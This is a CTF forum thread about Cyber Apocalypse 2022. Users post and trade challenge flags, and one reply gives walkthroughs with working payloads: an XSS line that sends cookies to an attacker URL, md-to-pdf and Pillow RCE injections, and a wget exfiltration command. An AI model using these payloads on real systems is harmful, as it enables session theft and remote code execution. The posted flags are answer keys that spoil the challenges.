Return to forum
Cyber Apocalypse CTF 2022 - Help & Flags
by - Thursday, January 1, 1970 at 12:00 AM
Member
Member
Posts: 10
Threads: 0
Joined: N/A
Reputation: 0

#71
May 16, 2022 at 2:57 PM
(May 16, 2022, 01:51 PM)just4htb1337 Wrote: Anyone willing to share the cookie generator for Mutation Lab .. been going at it for hours now.. Thanks


Yes, also having issues getting a cookie set, it's not just as simple as putting it in the session cookie section with burp
Reply
Banned
Posts: 41
Threads: 0
Joined: N/A
Reputation: 1

#72
May 16, 2022 at 2:58 PM
[quote="fl00d" pid="64279" dateline="1652707411"][quote="testing" pid="64267" dateline="1652706215"][quote="fl00d" pid="64263" dateline="1652706041"]Can anyone help me out with Mutation Lab. I got CVE-2021-23631 to work to view local files. I think I'm suppose to try to log in as the admin now. do i do something with the session/cookie?[/quote]how did you got CVE-2021-23631 to work , can you share the exploit[/quote]use burp on the dashboard and then this:{"svg":"data"}[color=#aeaeae][size=1][font=Roboto, Arial]}[/font][/size][/color][/quote]As anyone figured this out what to do next , struck here for ages.
Reply
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#73
May 16, 2022 at 3:18 PM
any hint with BlinkerFluids and Amidst Us web
Reply
Banned
Posts: 42
Threads: 0
Joined: N/A
Reputation: -19

#74
May 16, 2022 at 4:26 PM
Can anyone send write-up or flags for Hardware challenges??
Reply
Member
Member
Posts: 16
Threads: 0
Joined: N/A
Reputation: 0

#75
May 16, 2022 at 4:29 PM
can someone help with automation got base64 decoded been stuck since then!
Reply
Member
Member
Posts: 10
Threads: 0
Joined: N/A
Reputation: 0

#76
May 16, 2022 at 4:50 PM
Web - Kryptos Support
HTB{x55_4nd_id0rs_ar3_fun!!}

Web - BlinkerFluids
HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}

Web - Amidst Us
HTB{i_slept_my_way_to_rce}
Reply
Member
Member
Posts: 1
Threads: 0
Joined: N/A
Reputation: 0

#77
May 16, 2022 at 4:54 PM
(May 16, 2022, 04:50 PM)HungryGull Wrote: Web - Kryptos Support
HTB{x55_4nd_id0rs_ar3_fun!!}

Web - BlinkerFluids
HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}

Web - Amidst Us
HTB{i_slept_my_way_to_rce}


writeup plz
Reply
Member
Member
Posts: 10
Threads: 0
Joined: N/A
Reputation: 0

#78
May 16, 2022 at 5:11 PM
(May 16, 2022, 04:54 PM)si1 Wrote:
(May 16, 2022, 04:50 PM)HungryGull Wrote: Web - Kryptos Support
HTB{x55_4nd_id0rs_ar3_fun!!}

Web - BlinkerFluids
HTB{bl1nk3r_flu1d_f0r_int3rG4l4c7iC_tr4v3ls}

Web - Amidst Us
HTB{i_slept_my_way_to_rce}


writeup plz


Kryptos Support
python3 -m http.server 80
ngrok http 80
Send:
<script>new Image().src="https:// YOUR_NGROK_URL /?" + document.cookie;</script>
Replace Cookie
Open /settings
Burp Suite:
POST /api/users/update HTTP/1.1
...
<SNIP>
...
{"password":"newpassword","uid":"1"}
Open /login
admin : newpassword

BlinkerFluids
https:// github.com/simonhaenisch/md-to-pdf/issues/99
Burp Suite:
POST /api/invoice/add HTTP/1.1
...
<SNIP>
...
{"markdown_content":"---js
((require('child_process')).execSync('cat ../flag.txt > static/test.txt'))
---RCE"}
Open /static/test.txt

Amidst Us
https:// cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22817
https:// github.com/advisories/GHSA-8vj2-vxx3-667w
python3 -m http.server 80
ngrok http 80
Use Burp Suite:
..."background":["exec('import os;os.system(\"TEMP=$(cat ../flag.txt);wget https:// YOUR_NGROK_URL /?result=${TEMP}\")')",255,255]...
Reply
Member
Member
Posts: 4
Threads: 0
Joined: N/A
Reputation: 0

#79
May 16, 2022 at 7:30 PM
(May 16, 2022, 07:19 PM)hackerman Wrote: Willing to trade some pwn flags for crypto/hardwre


DM
Reply
Member
Member
Posts: 24
Threads: 0
Joined: N/A
Reputation: 1

#80
May 16, 2022 at 9:04 PM
I can trade Spiky Tamagotchi by pwns, dm me if you interested
Reply


 Users viewing this thread: Cyber Apocalypse CTF 2022 - Help & Flags: No users currently viewing.